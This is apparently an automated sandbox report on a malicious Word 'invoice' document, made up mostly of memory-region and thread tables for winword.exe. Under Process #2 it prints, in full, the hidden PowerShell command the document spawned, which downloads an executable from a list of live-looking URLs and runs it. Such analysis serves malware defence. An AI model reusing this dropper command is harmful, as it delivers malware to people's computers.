Fake Microsoft Word Invoice Analysis

Involved Hosts

Host	Resolved to	Country	City	Protocol
72.52.246.64		US	Lansing	IPPROTO_TCP
69.65.3.206		US	Arlington Heights	IPPROTO_TCP

Monitored Processes

Behavior Information - Sequential View

Process #1: winword.exe

(Host: 0, Network: 0)

Information	Value
ID	#1
File Name	c:\program files (x86)\microsoft office\root\office16\winword.exe
Command Line	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory	C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor	Start Time: 00:00:30, Reason: Analysis Target
Unmonitor	End Time: 00:02:59, Reason: Terminated by Timeout
Monitor Duration	00:02:29

OS Process Information

Information	Value
PID	0x974
Parent PID	0x494 (c:\windows\explorer.exe)
File Name	c:\program files (x86)\microsoft office\root\office16\winword.exe
Command Line	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE"
Is Created or Modified Executable
Integrity Level	Medium
Username	1R6PFH\hJrD1KOKY DS8lUjv
Groups	1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000e539 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00020fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00030fff	Pagefile Backed Memory	Readable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00063fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000080000	0x00080000	0x00080fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000090000	0x00090000	0x00090fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000000a0000	0x000a0000	0x000a6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000b0000	0x000b0000	0x000b1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000c0000	0x000c0000	0x000fffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00100000	0x00166fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000170000	0x00170000	0x00170fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000180000	0x00180000	0x00180fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000190000	0x00190000	0x00191fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001b0000	0x001b0000	0x001b2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001c0000	0x001c0000	0x001cffff	Private Memory		Region Actions
pagefile_0x00000000001d0000	0x001d0000	0x001d2fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001e0000	0x001e0000	0x001e2fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001f0000	0x001f0000	0x001f2fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000200000	0x00200000	0x00202fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000210000	0x00210000	0x0022ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000230000	0x00230000	0x0023ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000240000	0x00240000	0x00240fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000250000	0x00250000	0x0034ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000350000	0x00350000	0x0044ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000450000	0x00450000	0x00451fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000460000	0x00460000	0x00461fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000470000	0x00470000	0x00481fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000490000	0x00490000	0x004a1fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000004b0000	0x004b0000	0x004befff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000004c0000	0x004c0000	0x004c1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000004d0000	0x004d0000	0x0054ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000550000	0x00550000	0x0062efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000630000	0x00630000	0x00630fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000640000	0x00640000	0x00643fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000650000	0x00650000	0x00650fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000660000	0x00660000	0x00660fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000670000	0x00670000	0x006affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000006b0000	0x006b0000	0x006b0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000006c0000	0x006c0000	0x006c1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000006d0000	0x006d0000	0x007cffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000007d0000	0x007d0000	0x00957fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000960000	0x00960000	0x00960fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000970000	0x00970000	0x00970fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000980000	0x00980000	0x0098ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000990000	0x00990000	0x00b10fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x00b20000	0x00deefff	Memory Mapped File	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db	0x00df0000	0x00e0dfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000e10000	0x00e10000	0x00e4ffff	Private Memory	Readable, Writable	Region Actions
winword.exe	0x00e50000	0x01028fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000001030000	0x01030000	0x0242ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000002430000	0x02430000	0x02822fff	Pagefile Backed Memory	Readable	Region Actions
mso.dll	0x02830000	0x035e1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msxml6r.dll	0x035f0000	0x035f0fff	Memory Mapped File	Readable	Region Actions
private_0x0000000003600000	0x03600000	0x0363ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003640000	0x03640000	0x0367ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003680000	0x03680000	0x0377ffff	Private Memory	Readable, Writable	Region Actions
kernelbase.dll.mui	0x03780000	0x0383ffff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x0000000003840000	0x03840000	0x03841fff	Pagefile Backed Memory	Readable	Region Actions
c_1255.nls	0x03850000	0x03860fff	Memory Mapped File	Readable	Region Actions
private_0x0000000003870000	0x03870000	0x0396ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003970000	0x03970000	0x03a6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003aa0000	0x03aa0000	0x03adffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003af0000	0x03af0000	0x03b2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003b40000	0x03b40000	0x03b7ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003b80000	0x03b80000	0x03b9efff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003ba0000	0x03ba0000	0x03bdffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003be0000	0x03be0000	0x03c1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003c20000	0x03c20000	0x03c3efff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003c40000	0x03c40000	0x03c40fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003c50000	0x03c50000	0x03c6efff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003c70000	0x03c70000	0x03c90fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003cb0000	0x03cb0000	0x03ceffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003d10000	0x03d10000	0x03d10fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003d20000	0x03d20000	0x03d9ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003da0000	0x03da0000	0x03ddffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003de0000	0x03de0000	0x03dfefff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003e10000	0x03e10000	0x03e10fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003e30000	0x03e30000	0x03e6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003e70000	0x03e70000	0x03e70fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003e90000	0x03e90000	0x03e90fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003eb0000	0x03eb0000	0x03faffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003fb0000	0x03fb0000	0x03fb0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003fc0000	0x03fc0000	0x03ffffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004000000	0x04000000	0x0401efff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004020000	0x04020000	0x04020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004040000	0x04040000	0x0407ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004080000	0x04080000	0x040bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000040c0000	0x040c0000	0x040defff	Private Memory	Readable, Writable	Region Actions
private_0x00000000040f0000	0x040f0000	0x041effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004210000	0x04210000	0x0430ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000004310000	0x04310000	0x0472bfff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000004730000	0x04730000	0x0482ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004860000	0x04860000	0x04860fff	Private Memory	Readable, Writable	Region Actions
staticcache.dat	0x04870000	0x0519ffff	Memory Mapped File	Readable	Region Actions
private_0x00000000051b0000	0x051b0000	0x051effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005200000	0x05200000	0x052fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005300000	0x05300000	0x0533ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005340000	0x05340000	0x0534ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005380000	0x05380000	0x0547ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000054a0000	0x054a0000	0x054dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000054e0000	0x054e0000	0x05527fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005530000	0x05530000	0x0556ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000005580000	0x05580000	0x055bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000055c0000	0x055c0000	0x05607fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005610000	0x05610000	0x0561ffff	Private Memory	Readable, Writable	Region Actions
segoeui.ttf	0x05620000	0x0569efff	Memory Mapped File	Readable	Region Actions
private_0x00000000056d0000	0x056d0000	0x056dffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005730000	0x05730000	0x0576ffff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x0000000005770000	0x05770000	0x05f6ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000005f90000	0x05f90000	0x05fcffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005fd0000	0x05fd0000	0x060cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000060d0000	0x060d0000	0x062cffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006300000	0x06300000	0x0633ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006350000	0x06350000	0x0638ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000063a0000	0x063a0000	0x063affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000063f0000	0x063f0000	0x0642ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006430000	0x06430000	0x0652ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000065f0000	0x065f0000	0x066effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006770000	0x06770000	0x0686ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000006870000	0x06870000	0x06c6ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000006d30000	0x06d30000	0x06d6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006e10000	0x06e10000	0x06e4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006e90000	0x06e90000	0x06f8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006fd0000	0x06fd0000	0x0700ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007010000	0x07010000	0x0740ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007410000	0x07410000	0x0780ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007810000	0x07810000	0x07c10fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007c20000	0x07c20000	0x08020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008030000	0x08030000	0x08430fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008440000	0x08440000	0x0863ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008640000	0x08640000	0x08e3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008e40000	0x08e40000	0x092fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000009300000	0x09300000	0x096fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000009700000	0x09700000	0x097fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000009830000	0x09830000	0x0992ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000009940000	0x09940000	0x09a3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000009a40000	0x09a40000	0x09b3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000009b80000	0x09b80000	0x09c7ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000009c80000	0x09c80000	0x09d7ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000009ec0000	0x09ec0000	0x09fbffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000009fe0000	0x09fe0000	0x0a0dffff	Private Memory	Readable, Writable	Region Actions
private_0x000000000a140000	0x0a140000	0x0a23ffff	Private Memory	Readable, Writable	Region Actions
office.odf	0x0a240000	0x0a3f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000035c80000	0x35c80000	0x35c8ffff	Private Memory	Readable, Writable, Executable	Region Actions
cscapi.dll	0x67370000	0x6737afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x67380000	0x67398fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
For performance reasons, the remaining 412 entries are omitted. The remaining entries can be found in flog.txt.

Threads

Thread 0x978

(Host: 0, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Address	module_name = Unknown module name, function = _MsoMultiByteToWideChar@24, address_out = 1727055465	1	Fn
Memory	Protect	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Thread	Create	process_name = c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 712, address_out = 1963130104	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 709, address_out = 1963128984	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 717, address_out = 1963062441	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 616, address_out = 1961510594	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 600, address_out = 1961329478	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 712, address_out = 1963130104	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 709, address_out = 1963128984	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 717, address_out = 1963062441	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 616, address_out = 1961510594	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 600, address_out = 1961329478	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 712, address_out = 1963130104	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 709, address_out = 1963128984	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 717, address_out = 1963062441	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 616, address_out = 1961510594	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 1960968192	1	Fn
Module	Get Address	module_name = Unknown module name, function = 600, address_out = 1961329478	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn
Memory	Free	c:\program files (x86)\microsoft office\root\office16\winword.exe	1	Fn

Process #2: powershell.exe

(Host: 0, Network: 0)

Information	Value
ID	#2
File Name	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line	powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://carbeyondstore.com/cianrft/,http://pxpgraphics.com/espzyurt/,http://nonieuro.com/xauqt/,http://studiogif.com.br/jedtvuziky/,http://motorgirlstv.com/kdm/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
Initial Working Directory	C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor	Start Time: 00:01:01, Reason: Child Process
Unmonitor	End Time: 00:02:59, Reason: Terminated by Timeout
Monitor Duration	00:01:58

OS Process Information

Information	Value
PID	0xa94
Parent PID	0x974 (c:\program files (x86)\microsoft office\root\office16\winword.exe)
File Name	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line	powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://carbeyondstore.com/cianrft/,http://pxpgraphics.com/espzyurt/,http://nonieuro.com/xauqt/,http://studiogif.com.br/jedtvuziky/,http://motorgirlstv.com/kdm/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
Is Created or Modified Executable
Integrity Level	Medium
Username	1R6PFH\hJrD1KOKY DS8lUjv
Groups	1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000e539 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	Readable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	Region Actions
